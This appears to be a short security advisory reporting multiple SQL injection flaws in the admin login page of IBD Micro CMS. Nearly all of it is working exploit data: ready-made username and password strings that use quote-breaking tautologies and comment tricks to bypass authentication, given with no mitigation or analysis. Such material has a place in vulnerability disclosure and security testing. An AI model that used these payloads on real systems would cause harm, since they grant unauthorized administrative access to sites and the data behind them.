IBD Micro CMS 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities

IBD Micro CMS 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following exploit data is available:

Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("

Username: valid_username/* [eg. admin/*]
Password: learn3r [or whatever]

Or Username: " or 1=1/*
Password: learn3r [or whatever]